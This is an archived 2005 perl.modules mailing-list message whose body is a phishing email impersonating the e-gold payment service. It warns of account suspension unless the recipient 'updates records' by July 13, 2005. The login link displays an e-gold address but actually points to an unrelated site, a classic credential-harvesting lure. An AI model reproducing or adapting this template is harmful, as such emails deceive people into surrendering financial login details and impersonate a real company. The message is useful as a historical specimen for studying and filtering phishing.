Newsgroups: perl.modules
Path: nntp.perl.org
Xref: nntp.perl.org perl.modules:41528
Return-Path: <AccountRobot_donotreply@e-gold.com>
Mailing-List: contact modules-help@perl.org; run by ezmlm
Delivered-To: mailing list modules@perl.org
Received: (qmail 1045 invoked from network); 10 Jul 2005 10:18:29 -0000
Received: from x1a.develooper.com (HELO x1.develooper.com) (216.52.237.111)
  by lists.develooper.com with SMTP; 10 Jul 2005 10:18:29 -0000
Received: (qmail 9235 invoked by uid 225); 10 Jul 2005 10:18:28 -0000
Delivered-To: modules@perl.org
Received: (qmail 9198 invoked by alias); 10 Jul 2005 10:18:27 -0000
X-Spam-Status: No, hits=2.4 required=8.0
	tests=BAYES_50,HTML_40_50,HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,NO_REAL_NAME,URIBL_SBL
X-Spam-Check-By: la.mx.develooper.com
Received-SPF: neutral (x1.develooper.com: local policy)
Received: from cheitan.cyberdusk.pl (HELO cheitan.cyberdusk.pl) (193.238.25.222)
    by la.mx.develooper.com (qpsmtpd/0.28) with ESMTP; Sun, 10 Jul 2005 03:18:26 -0700
Received: (qmail 24445 invoked from network); 10 Jul 2005 12:18:15 +0200
Received: from unknown (HELO cheitan.cyberdusk.pl) (127.0.0.1)
  by 127.0.0.1 with SMTP; 10 Jul 2005 12:18:15 +0200
Date: Sun, 10 Jul 2005 12:18:15 +0200
To: "modules@perl.org\r" <modules@perl.org>
Subject: Notification of e-gold account update
Message-ID: <0df71c2ab4e502a2fff56a40be55e1df@cheitan.cyberdusk.pl>
X-Priority: 3
X-Mailer: PHPMailer [version 1.72]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="iso-8859-1"
Approved: news@nntp.perl.org
From: AccountRobot_donotreply@e-gold.com

<!--StartFragment -->
<pre><tt>** e-gold Account Information Update Notice **</tt></pre>
<pre><tt>Important information about your e-gold account:</tt></pre>
      <p><font face="Courier New" size="2">It has come to our attention that your
      <strong>e-gold</strong> account information needs to be <br>
      updated as part of our continuing commitment to protect your account and
      to <br>
      reduce the instance of fraud on our website. If you could please take a 
      few
      minutes <br>
      out of your online experience and update your personal records you will
      not run into <br>
      any future problems with the online service. </p>
      <p>However, failure to update your records will result in account
      suspension. <br>
      Please update your records on or before <font color="red"><strong>July 13, 2005</strong>.</font> 

<br>
      <br>
      Once you have updated your account records, your <strong>e-gold</strong> session will not be <br>
      interrupted and will continue as normal. </p>
      <p>To update your <strong>e-gold </strong>account<b> </b>records click on the following link:
      <br>
      <a href="http://peopleofpraise.net/rss/.log/">
      https://www.e-gold.com/acct/login.html</a></p>
      <p>Thank You. <br>
      <strong>e-gold</strong><font face="Verdana" size="2"><span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Courier New"><strong> 
      Team Update!</strong></span></font></font><tt><br>
 </tt></p>
      <p><tt><br>
      e-gold Resource Links:<br>
      <br>
      </tt><font face="Courier New" size="2">Accounts Management As outlined in our User Agreement, <strong>e-gold</strong></font><font face="Verdana" size="2"><span 

style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Courier New"><strong><sup>® </sup></strong></span>
      <font face="Courier New" size="2">will 

<br>
      periodically send you information about site changes and enhancements. </p>
      <p>Visit our Privacy Policy and User Agreement if you have any questions.
      <br>
      <a href="http://www.e-gold.com/unsecure/terms.htm">
      http://www.e-gold.com/unsecure/terms.htm</a><p>
      </font>
      </font><tt><br>
------------------------------------------------------<br>
         Thank you for using e-gold!<br>
------------------------------------------------------</tt><pre><tt>Please do not reply to this automatically generated email message.</tt></pre>


